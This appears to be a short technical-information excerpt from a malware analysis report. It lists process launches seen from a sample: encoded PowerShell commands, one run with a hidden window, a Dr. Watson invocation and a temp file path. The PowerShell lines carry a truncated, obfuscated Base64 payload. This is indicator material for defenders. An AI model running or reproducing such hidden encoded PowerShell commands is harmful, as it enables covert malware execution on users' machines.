Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAdgAgACAAeAA4AFkAZQBJAFMAIAAgACgAIAAgAFsAdABZAHAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAHMAWQBzAHQAJwAsACcAUgBlAEMAJwAsACcAVABPAFIAeQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\1197104.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAHMAdgAgACAAeAA4AFkAZQBJAFMAIAAgACgAIAAgAFsAdABZAHAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAHMAWQBzAHQAJwAsACcAUgBlAEMAJwAsACcAVABPAFIAeQ...' (with a hidden window)